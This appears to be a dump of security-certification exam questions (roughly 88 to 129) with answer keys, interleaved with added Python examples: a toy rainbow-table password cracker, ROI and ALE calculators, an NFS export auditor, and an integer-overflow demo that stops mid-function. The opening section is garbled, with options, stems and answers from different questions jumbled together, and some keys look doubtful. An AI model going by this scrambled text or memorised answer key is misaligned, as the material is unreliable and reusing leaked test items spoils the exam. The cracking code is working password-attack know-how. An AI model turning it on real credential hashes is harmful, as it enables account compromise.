Ensure web services hosting the event use TCP cookies and deny_hosts. D. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 88 The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the company's contribution to worldwide Distributed Denial of Service (DDoS) attacks. Notify customers when services they run are involved in an attack. Block traffic from the ISP's networks destined for blacklisted IPs. Which of the following processes should be followed? . C. B. D. C. B. Contract and configure scrubbing services with third-party DDoS mitigation providers. A. E. Which of the following should the ISP implement? (Select TWO). One system will be upgraded in six months. Scan the ISP's customer networks using an up-to-date vulnerability scanner. There are three legacy applications on the network that cannot meet this policy. Purchase additional bandwidth from the company's Internet service provider. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions. Block traffic with an IP source not allocated to customers from exiting the ISP's network. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP. and two are not expected to be upgraded or removed from the network. Correct Answer: DE Section: (none) Explanation Explanation/Reference: QUESTION 89 A security policy states that all applications on the network must have a password length of eight characters.appropriately address Joe's concerns? A.

The Business Operations department has determined the loss associated to each attack is $40. $100. $200. Provide a business justification for a risk exception Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 90 A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Which of the following is the monetary value earned during the first year of operation? A.000. Which of the following is a more cost effective alternative to buying a new SAN? A. $140. the number of DoS attacks was reduced to one time a year.000 B. Based on heuristic information from the Security Operations Center (SOC). Provide a business justification to avoid the risk D. Enable multipath to increase availability . Inherit the risk for six months C. The cost of the countermeasures was $100.000 D. and will cause costly downtimes if servers run out disk space. After implementing application caching.000 C. Establish a risk matrix B. $60.000. a Denial of Service Attack (DoS) has been successfully executed 5 times a year.000 Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 91 Company ABC's SAN is nearing capacity.A.

The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. attend training. D. Correct Answer: DF Section: (none) Explanation . A backup is running on the thin clients at 9am every morning. Install 10-Gb uplinks between the hosts and the lab to increase network capacity. Interview candidates. This division will require personnel to have high technology skills and industry certifications. The outage lasts for around 10 minutes. Which of the following is the BEST method for this manager to gain insight into this industry to execute the task? A. Add guests with more memory to increase capacity of the infrastructure. G. Attend conferences. webinars. B. The lab desktops are using more memory than is available to the host systems. Attend meetings with staff. C. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO). E.B. and training to remain current with the industry and job requirements Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 93 At 9:00 am each morning. F. after which everything runs properly again. Implement replication to offsite datacenter Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 92 A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. Install more memory in the thin clients to handle the increased load while booting. all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The lab desktops are saturating the network while booting. H. Booting all the lab desktops at the same time is creating excessive I/O. Enable deduplication on the storage pools C. and hire a staffing company that specializes in technology jobs B. Install faster SSD drives in the storage system used in the infrastructure. Implement snapshots to reduce virtual disk size D. internal training. A. 
and become certified in software management D. Interview employees and managers to discover the industry hot topics and trends C.

Improper handling of client data. which of the following trusted system concepts can be implemented? A. this virtual hardware is indistinguishable from real hardware. can natively integrate with AD. testing. Improper handling of customer data. Continuous chain of trust C. Which of the following would BEST meet the requirement? A. loss of intellectual property and reputation damage Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 95 A security administrator wants to deploy a dedicated storage solution which is inexpensive. interoperability agreement issues and regulatory issues C. Virtual storage . Software-based trust anchor with no root of trust Answer: C QUESTION 94 The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Geographical regulation issues. allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. loss of intellectual property and interoperability agreement issues B. SAN B. Which of the following risks are MOST likely to occur if adequate controls are not implemented? A. To virtual machines.Explanation/Reference: A popular commercial virtualization platform allows for the creation of virtual hardware. Cultural differences. Functions to be outsourced include: business analysts. Chain of trust with a hardware root of trust D. software development and back office functions that deal with the processing of customer data. Software-based root of trust B. increased cost of doing business and divestiture issues D. By implementing virtualized TPMs. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. NAS C. Virtual SAN D.

UTM C. Antivirus D. Remove the system from the network and disable IPv6 at the router C. provided they are on an approved device list. Locate and remove the unauthorized 6to4 relay from the network D. Disable the switch port and block the 2001::/32 traffic at the firewall Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 97 In order to reduce costs and improve employee satisfaction. The network administrator confirms there is no IPv6 routing into or out of the network. . Which of the following is the BEST course of action? A. DLP Answer: A QUESTION 96 A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. a large corporation is creating a BYOD policy.Correct Answer: B Section: (none) Explanation Explanation/Reference: The risk manager has requested a security solution that is centrally managed. Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO). and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. NIPS E. It will allow access to email and remote connections to the corporate enterprise from personal devices. Investigate the network traffic and block UDP port 3544 at the firewall B. Which of the following would BEST meet this requirement? A. can easily be updated. HIPS B.

The security architect notes concerns about data separation. Require smart card authentication for all devices. Enable time of day restrictions for personal devices. D. Job rotation C. an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Correct Answer: BD Section: (none) Explanation Explanation/Reference: Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare. B. Answer: C QUESTION 98 After a security incident. Most of company XYZ's customers are willing to accept the risks of unauthorized disclosure and access to information by outside users. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? A. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer. regulatory requirements concerning PII. Which of the following BEST describes the core concerns of the security architect? A. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies. and administrative complexity on the proposal.A. C. Not all of company XYZ's customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings. Separation of duties Correct Answer: B Section: (none) Explanation . The availability requirements in SLAs with each hosted customer would have to be re. confidentiality. Least privilege B. Implement NAC to limit insecure devices access. Mandatory vacation D. E. education. C. B. 
Encrypt data in transit for remote access.written to account for the transfer of virtual machines between physical platforms for regular maintenance. and manufacturing. D. Provide free email software for personal devices.

Refuse LM and only accept NTLMv2 B. Company A's security administrator should use an HTTPS capable browser to transfer the data. The security authentication on the Windows domain is set to the highest level. Company A and B must create a site-to-site IPSec VPN on their respective firewalls. C. E. using company B's API in an automated manner. Company A must install an SSL tunneling software on the financial system. Refuse NTLMv2 and accept LM D. while company B's API supports encryption. therefore the transfer must occur directly between company A's financial system and company B's destination server using the supplied API. Correct Answer: A Section: (none) Explanation . Accept only NTLM Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 100 Company A needs to export sensitive data from its financial system to company B's database. Which of the following settings on the UNIX server would correct this problem? A. Accept only LM C.Explanation/Reference: QUESTION 99 A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. Company A's policy prohibits the use of any intermediary external systems to transfer or store its sensitive data. company A's legacy financial software does not support encryption. Windows users are stating that they cannot authenticate to the UNIX share. Additionally. B. Which of the following will provide end-to-end encryption for the data transfer while adhering to these requirements? A. Company A should use a dedicated MPLS circuit to transfer the sensitive data to company D.

Explanation/Reference:

QUESTION 101
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so
the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially
occur?

A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 102
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to
determine which additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of
the following BEST describes the scenario presented and the document the ISO is reviewing?

A. The ISO is evaluating the business implications of a recent telephone system failure within the BIA.
B. The ISO is investigating the impact of a possible downtime of the messaging system within the RA.
C. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy within the RFQ.
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 103
Two universities are making their 802.11n wireless networks available to the other university's students. The infrastructure will pass the student's credentials back to the
home school for authentication via the Internet. The requirements are:
Mutual authentication of clients and authentication server
The design should not limit connection speeds
Authentication must be delegated to the home school
No passwords should be sent unencrypted
The following design was implemented:
WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security
RADIUS proxy servers will be used to forward authentication requests to the home school
The RADIUS servers will have certificates from a common public certificate authority
A strong shared secret will be used for RADIUS server authentication
Which of the following security considerations should be added to the design?

A. The transport layer between the RADIUS servers should be secured
B. WPA Enterprise should be used to decrease the network overhead
C. The RADIUS servers should have local accounts for the visiting students
D. Students should be given certificates to use for authentication to the network

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 104
A company is deploying a new iSCSI-based SAN. The requirements are as follows:
SAN nodes must authenticate each other.
Shared keys must NOT be used.
Do NOT use encryption in order to gain performance.
Which of the following design specifications meet all the requirements? (Select TWO).

A. Targets use CHAP authentication
B. IPSec using AH with PKI certificates for authentication
C. Fiber channel should be used with AES
D. Initiators and targets use CHAP authentication
E. Fiber channel over Ethernet should be used
F. IPSec using AH with PSK authentication and 3DES
G. Targets have SCSI IDs for authentication

Correct Answer: BD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 105
A large organization has recently suffered a massive credit card breach. During the months of Incident Response, there were multiple attempts to assign blame for whose
fault it was that the incident occurred. In which part of the incident response phase would this be addressed in a controlled and productive manner?

A. During the Identification Phase
B. During the Lessons Learned phase
C. During the Containment Phase
D. During the Preparation Phase

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 106
Three companies want to allow their employees to seamlessly connect to each other's wireless corporate networks while keeping one consistent wireless client
configuration. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companies is
authenticated by the home office when connecting to the other companies' wireless network. All three companies have agreed to standardize on 802.1x EAP-PEAP-
MSCHAPv2 for client configuration. Which of the following should the three companies implement?

A. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation.
B. The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID.
C. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates.
D. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 107
A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution has been in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable?

A. Spiral model
B. Incremental model
C. Waterfall model
D. Agile model

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 108
A security company is developing a new cloud-based log analytics platform. Its purpose is to allow:
Customers to upload their log files to the "big data" platform
Customers to perform remote log search
Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/or discovery
Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE).

A. Secure storage and transmission of API keys
B. Secure protocols for transmission of log files and search results
C. At least two years retention of log files in case of e-discovery requests
D. Multi-tenancy with RBAC support
E. Sanitizing filters to prevent upload of sensitive log file contents
F. Encryption of logical volumes on which the customers' log files reside

Correct Answer: ABD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 109
A security administrator wants to calculate the ROI of a security design which includes the purchase of new equipment. The equipment costs $50,000 and it will take 50
hours to install and configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do the installation. Given that the new design and
equipment will allow the company to increase revenue and make an additional $100,000 on the first year, which of the following is the ROI expressed as a percentage for
the first year?

A. -45 percent
B. 5.5 percent
C. 45 percent
D. 82 percent

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 110
A security manager is looking into the following vendor proposal for a cloud-based SIEM solution. The intention is that the cost of the SIEM solution will be justified by
having reduced the number of incidents and therefore saving on the amount spent investigating incidents. Proposal: External cloud-based software as a service
subscription costing $5,000 per month. Expected to reduce the number of current incidents per annum by 50%. The company currently has ten security incidents per
annum at an average cost of $10,000 per incident. Which of the following is the ROI for this proposal after three years?

A. -$30,000
B. $120,000
C. $150,000
D. $180,000

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 111
An IT Manager is concerned about errors made during the deployment process for a new model of tablet. Which of the following would suggest best practices and configuration parameters that technicians could follow during the deployment process?

A. Automated workflow
B. Procedure
C. Corporate standard
D. Guideline
E. Policy

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 112
The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. A vulnerability scan found a collection of Linux servers
that are missing OS level patches. Upon further investigation, a technician notices that there are a few unidentified processes running on a number of the servers. What
would be a key FIRST step for the data security team to undertake at this point?

A. Capture process ID data and submit to anti-virus vendor for review.
B. Reboot the Linux servers, check running processes, and install needed patches.
C. Remove a single Linux server from production and place in quarantine.
D. Notify upper management of a security breach.
E. Conduct a bit level image, including RAM, of one or more of the Linux servers.

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 113
An organization has implemented an Agile development process for front end web application development. A new security architect has just joined the company and
wants to integrate security activities into the SDLC. Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO).

A. Static and dynamic analysis is run as part of integration
B. Security standards and training is performed as part of the project
C. Daily stand-up meetings are held to ensure security requirements are understood
D. For each major iteration penetration testing is performed
E. Security requirements are story boarded and make it into the build
F. A security design is performed at the end of the requirements phase

Correct Answer: AD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 114
A pentester must attempt to crack passwords on a Windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords in the shortest time period?

A. Online password testing
B. Rainbow tables attack
C. Dictionary attack
D. Brute force attack

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
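Question 114 turns on why a precomputed table beats a dictionary or brute force once the hashes are in hand: the hashing work is done ahead of time and only chain endpoints are stored. The following is an added example, not part of the exam dump, that builds a toy rainbow table (3 lowercase letters, unsalted MD5, 50-step chains, all of these are assumed parameters) and cracks a hash with it. It also shows the caveat a practitioner would want: the same table is useless against a salted hash, which is why the salting in Question 134 and the key stretching in Question 152 matter.

```python
import hashlib
import string

# Toy parameters (assumed): 3 lowercase letters = 17,576 candidates, unsalted MD5.
# Real tables cover far larger keyspaces; the mechanics are identical.
ALPHABET = string.ascii_lowercase
PW_LEN = 3
KEYSPACE = len(ALPHABET) ** PW_LEN
CHAIN_LEN = 50


def h(password: str, salt: str = "") -> str:
    """Unsalted MD5 by default; pass a salt to see why salting defeats the table."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def reduce_(digest: str, step: int) -> str:
    """Map a hash back into the password space. The step index makes each chain
    position use a different reduction, which limits chain merges (the 'rainbow')."""
    n = (int(digest[:12], 16) + step) % KEYSPACE
    chars = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(ALPHABET))
        chars.append(ALPHABET[r])
    return "".join(chars)


def walk(start: str, steps: int) -> str:
    """Advance a chain: pw -> reduce(hash(pw), step), repeated `steps` times."""
    pw = start
    for step in range(steps):
        pw = reduce_(h(pw), step)
    return pw


def build_table(start_points):
    """Store only endpoint -> start point; intermediate passwords are recomputed
    on demand. That is the time/memory trade-off of the technique."""
    table = {}
    for start in start_points:
        table.setdefault(walk(start, CHAIN_LEN), start)
    return table


def crack(table, target_hash: str):
    """Assume the target sits at position i of some chain, finish that chain from
    there, and if the endpoint is known regenerate the chain to find the password."""
    for i in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_(target_hash, i)
        for step in range(i + 1, CHAIN_LEN):
            pw = reduce_(h(pw), step)
        start = table.get(pw)
        if start is None:
            continue                       # endpoint not in table
        cand = start
        for step in range(CHAIN_LEN):
            if h(cand) == target_hash:
                return cand
            cand = reduce_(h(cand), step)
        # false alarm: a different chain reached the same endpoint, keep searching
    return None


# Constructed start points: one known password first, then pseudo-random ones.
START_POINTS = ["abc"] + [reduce_(h(str(i)), 0) for i in range(300)]
TABLE = build_table(START_POINTS)


if __name__ == "__main__":
    target = walk("abc", 17)               # some password inside the 'abc' chain
    print("unsalted:", crack(TABLE, h(target)), "(expected", target + ")")
    print("salted:  ", crack(TABLE, h(target, salt="7f3a")))   # table is useless
```

The lookup costs at most CHAIN_LEN squared over two hashes per target regardless of keyspace size, which is why a table covering a Windows NT-hash keyspace (no salt) cracks "most passwords in the shortest time" once built; a per-user salt multiplies the table size by the number of salts and makes the approach impractical.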

QUESTION 115
A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company servers via REST/JSON calls.
The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST be
implemented to enable stateless communication?

A. Generate a one-time key as part of the device registration process.
B. Require SSL between the mobile application and the web services gateway.
C. The jsession cookie should be stored securely after authentication.
D. Authentication assertion should be stored securely on the client.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 116
An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The new
software product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be
more secure. How many years until there is a return on investment for this new package?

A. 1
B. 2
C. 3
D. 4

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
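Questions 109, 110 and 116 all use the same small set of cost-benefit formulas, and the exam's idea of "ROI" shifts between a percentage (109), a net dollar figure (110) and a break-even year count (116). The following added example, not part of the exam dump, works all three through as functions so the arithmetic can be checked; the same helpers cover the SLE and ALE questions that appear later on this page (asset value times exposure factor, times annualized rate of occurrence). Figures are the ones stated in the questions.

```python
def roi_percent(gain: float, cost: float) -> float:
    """Classic ROI: (gain - cost) / cost, as a percentage."""
    return (gain - cost) / cost * 100


def question_109_roi() -> int:
    """$50,000 equipment plus 50 contractor hours at $100, against $100,000 first-year gain."""
    cost = 50_000 + 50 * 100
    return round(roi_percent(100_000, cost))


def siem_net_return(monthly_fee: float, years: int, incidents_per_year: int,
                    reduction: float, cost_per_incident: float) -> float:
    """Question 110: savings from avoided incidents minus subscription cost, in dollars."""
    cost = monthly_fee * 12 * years
    avoided_incidents = incidents_per_year * reduction * years
    return avoided_incidents * cost_per_incident - cost


def breakeven_years(initial_cost: float, old_monthly_revenue: float,
                    new_monthly_revenue: float, yearly_maintenance: float,
                    maintenance_from_year: int = 2) -> int:
    """Question 116: whole years until the cumulative net gain covers the purchase.
    Only the revenue increase counts, and maintenance is charged from year two."""
    cumulative = 0.0
    year = 0
    while cumulative < initial_cost:
        year += 1
        cumulative += (new_monthly_revenue - old_monthly_revenue) * 12
        if year >= maintenance_from_year:
            cumulative -= yearly_maintenance
    return year


def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = asset value * exposure factor."""
    return asset_value * exposure_factor


def annualized_loss_expectancy(asset_value: float, exposure_factor: float, aro: float) -> float:
    """ALE = SLE * annualized rate of occurrence (a fire every four years is ARO 0.25)."""
    return single_loss_expectancy(asset_value, exposure_factor) * aro


if __name__ == "__main__":
    print("Q109 ROI %:", question_109_roi())
    print("Q110 3-year return $:", siem_net_return(5_000, 3, 10, 0.5, 10_000))
    print("Q116 break-even years:", breakeven_years(180_000, 10_000, 15_000, 2_000))
```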

QUESTION 117
An IT manager is working with a project manager to implement a new ERP system capable of transacting data between the new ERP system and the legacy system. As
part of this process, both parties must agree to the controls utilized to secure data connections between the two enterprise systems. This is commonly documented in
which of the following formal documents?

A. Memorandum of Understanding
B. Information System Security Agreement
C. Interconnection Security Agreement
D. Interoperability Agreement
E. Operating Level Agreement

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 118
In an effort to minimize costs, the management of a small candy company wishes to explore a cloud service option for the development of its online applications. The company does not wish to invest heavily in IT infrastructure. Which of the following solutions should be recommended?

A. A public IaaS
B. A public PaaS
C. A public SaaS
D. A private SaaS
E. A private IaaS
F. A private PaaS

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 119
An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. In order to reduce costs and administrative overhead, the security architect wants to outsource identity proofing and second factor digital delivery to the third party. Which of the following solutions will address the enterprise requirements?

A. Implementing federated network access with the third party.
B. Using a VPN concentrator which supports dual factor via hardware tokens.
C. Using a HSM at the network perimeter to handle network device access.
D. Implementing 802.1x with EAP-TTLS across the infrastructure.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 120
After reviewing a company's NAS configuration and file system access logs, the auditor is advising the security administrator to implement additional security controls on the NFS export. The security administrator decides to remove the no_root_squash directive from the export and add the nosuid directive. Which of the following is true about the security controls implemented by the security administrator?

A. Adding the nosuid directive disables regular users from accessing files owned by the root user over NFS even after using the SU command.
B. Removing the no_root_squash directive grants the root user remote NFS read/write access to important files owned by root on the NAS.
C. Users with root access on remote NFS client computers can always use the SU command to modify other user's files on the NAS.
D. The newly implemented security controls are in place to ensure that NFS encryption can only be controlled by the root user.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 121
CORRECT TEXT
An administrator wants to install a patch to an application. Given the scenario, download, verify and install the patch in the most secure manner.
Instructions: The last install that is completed will be the final submission.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:
Please check the explanation part for full details on solution.
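Question 120 is about what root_squash actually does: with no_root_squash removed, a remote uid 0 is mapped to the anonymous uid (65534 by default, or anonuid), but a remote root can still su to any other uid and act as that user, which is why option C is the true statement. The following added example, not part of the exam dump, parses exports(5) syntax and reports the effective uid a remote root gets, plus the findings an auditor would raise. The sample /etc/exports is constructed. One caveat the question glosses over: nosuid is a client-side mount option (mount -o nosuid), not an export directive, so the block also checks a client's mount options for the usual nosuid,nodev,noexec trio.

```python
import re

ANON_UID_DEFAULT = 65534   # nobody/nfsnobody on most distributions

# Constructed /etc/exports, not taken from the question.
SAMPLE_EXPORTS = """\
# NAS exports
/srv/data     10.0.0.0/24(rw,sync,no_root_squash)
/srv/backup   *(rw,sync)
/srv/public   10.0.0.0/24(ro,sync,all_squash,anonuid=1000,anongid=1000)
"""

CLIENT_HARDENING = {"nosuid", "nodev", "noexec"}


def parse_exports(text: str):
    """Return a list of (path, client, options) from exports(5) syntax."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if m is None:
                raise ValueError(f"malformed export spec: {spec!r}")
            client = m.group(1) or "*"
            opts = {}
            for opt in filter(None, (m.group(2) or "").split(",")):
                key, _, val = opt.partition("=")
                opts[key] = val if val else True
            entries.append((path, client, opts))
    return entries


def effective_root_uid(opts: dict) -> int:
    """UID a remote root process acts as on this export (root_squash is the default)."""
    if "no_root_squash" in opts:
        return 0
    return int(opts.get("anonuid", ANON_UID_DEFAULT))


def audit(entries):
    """Findings a reviewer of the NAS configuration would raise."""
    findings = []
    for path, client, opts in entries:
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash: remote root keeps uid 0"))
        if client == "*":
            findings.append((path, client, "export is offered to every host"))
        if "insecure" in opts:
            findings.append((path, client, "insecure: accepts requests from unprivileged source ports"))
    return findings


def missing_client_hardening(mount_opts: str) -> set:
    """Mount options (client side) that should accompany an untrusted NFS share."""
    present = set(filter(None, mount_opts.split(",")))
    return CLIENT_HARDENING - present


if __name__ == "__main__":
    entries = parse_exports(SAMPLE_EXPORTS)
    for path, client, opts in entries:
        print(f"{path} {client}: remote root acts as uid {effective_root_uid(opts)}")
    for finding in audit(entries):
        print("FINDING:", *finding)
    print("client still missing:", missing_client_hardening("rw,nosuid"))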

QUESTION 122
An IT auditor is reviewing the data classification for a sensitive system. The company has classified the data stored in the sensitive system according to the following matrix:

DATA TYPE       CONFIDENTIALITY  INTEGRITY  AVAILABILITY
Financial       HIGH             HIGH       LOW
Client name     MEDIUM           MEDIUM     HIGH
Client address  LOW              MEDIUM     LOW
AGGREGATE       MEDIUM           MEDIUM     MEDIUM

The auditor is advising the company to review the aggregate score and submit it to senior management. Which of the following should be the revised aggregate score?

A. HIGH, MEDIUM, LOW
B. MEDIUM, MEDIUM, LOW
C. HIGH, HIGH, HIGH
D. MEDIUM, MEDIUM, MEDIUM

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 123
Company policy requires that all company laptops meet the following baseline requirements:
Software requirements: Antivirus, Anti-malware, Anti-spyware, Log monitoring, Full-disk encryption, Terminal services enabled for RDP, Administrative access for local users
Hardware restrictions: Bluetooth disabled, FireWire disabled, WiFi adapter disabled
Ann, a web developer, reports performance issues with her laptop and is not able to access any network resources. After further investigation, a bootkit was discovered and it was trying to access external websites. Which of the following hardening techniques should be applied to mitigate this specific issue from reoccurring? (Select TWO).

A. Group policy to limit web access
B. Restrict VPN access for all mobile users
C. Remove full-disk encryption
D. Remove administrative access to local users
E. Restrict/disable TELNET access to network resources
F. Perform vulnerability scanning on a daily basis
G. Restrict/disable USB access

Correct Answer: DG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 124
A security analyst, Ann, states that she believes Internet facing file transfer servers are being attacked. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers?

A. Provide a report of all the IP addresses that are connecting to the systems and their locations
B. Establish alerts at a certain threshold to notify the analyst of high activity
C. Provide a report showing the file transfer logs of the servers
D. Compare the current activity to the baseline of normal activity

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 125
The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and, based on industry data, the exposure factor to fires is only 20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE?

A. $6,000
B. $24,000
C. $30,000
D. $96,000

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 126
A company has decided to change its current business direction and refocus on core business. Consequently, several company sub-businesses are in the process of being sold-off. A security consultant has been engaged to advise on residual information security concerns with a de-merger. From a high-level perspective, which of the following BEST provides the procedure that the consultant should follow?

A. Perform a penetration test for the current state of the company. Perform another penetration test after the de-merger. Identify the gaps between the two tests.
B. Duplicate security-based assets should be sold off for commercial gain to ensure that the security posture of the company does not decline.
C. Explain that security consultants are not trained to offer advice on company acquisitions or demergers. This needs to be handled by legal representatives well versed in corporate law.
D. Identify the current state from a security viewpoint. Based on the demerger, assess what the security gaps will be from a physical, technical, DR, and policy/awareness perspective.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 127
The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payments. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. A specially crafted value could be entered and cause a roll over, resulting in the shipping cost being subtracted from the balance and in some instances resulted in a negative balance. As a result, the system processed the negative balance as zero dollars. Which of the following BEST describes the application issue?

A. Race condition
B. Click-jacking
C. Integer overflow
D. Use after free
E. SQL injection

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 128
An organization recently upgraded its wireless infrastructure to support 802.1x and requires all clients to use this method. After the upgrade, several critical wireless clients fail to connect because they are only pre-shared key compliant. For the foreseeable future, none of the affected clients have an upgrade path to put them into compliance with the 802.1x requirement. Which of the following provides the MOST secure method of integrating the non-compliant clients into the network?

A. Create a separate SSID and pre-shared WPA2 key on a new network segment and only allow required communication paths.
B. Create a separate SSID and require the use of dynamic encryption keys.
C. Create a separate SSID with a pre-shared key to support the legacy clients and rotate the key at random intervals.
D. Create a separate SSID and require the legacy clients to connect to the wireless network using certificate-based 802.1x.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 129
During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance to regulations. The audit discovers that 40 percent of the desktops do not meet requirements. Which of the following is the MOST likely cause of the noncompliance?

A. The devices are being modified and settings are being overridden in production.
B. The patch management system is causing the devices to be noncompliant after issuing the latest patches.
C. The desktop applications were configured with the default username and password.
D. 40 percent of the devices use full disk encryption.

Correct Answer: A
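The roll-over in Question 127 is an integer overflow on a user-controlled field: the shipping amount lands in a fixed-width signed integer, a large enough value wraps negative, the negative shipping is subtracted from the balance, and the application then bills a negative total as zero. The following added example, not part of the exam dump, simulates that 32-bit wrap explicitly (Python integers do not overflow on their own) and places the vulnerable calculation beside a hardened one that validates the field against a business range and the storage width before doing arithmetic. The $500 shipping limit and the cent amounts are assumed.

```python
INT32_MAX = 2**31 - 1
MAX_SHIPPING_CENTS = 50_000   # assumed business rule: no shipping charge above $500


def wrap_int32(n: int) -> int:
    """Simulate storing n in a signed 32-bit column (two's-complement truncation).
    Python ints never overflow, so the wrap is made explicit here."""
    n &= 0xFFFFFFFF
    return n - 2**32 if n > INT32_MAX else n


def vulnerable_total(balance_cents: int, shipping_field: str) -> int:
    """Before: the user-supplied shipping amount is parsed and stored as int32,
    added to the balance, and a negative result is billed as zero."""
    shipping = wrap_int32(int(shipping_field))
    total = wrap_int32(balance_cents + shipping)
    return max(total, 0)          # "the system processed the negative balance as zero"


def hardened_total(balance_cents: int, shipping_field: str) -> int:
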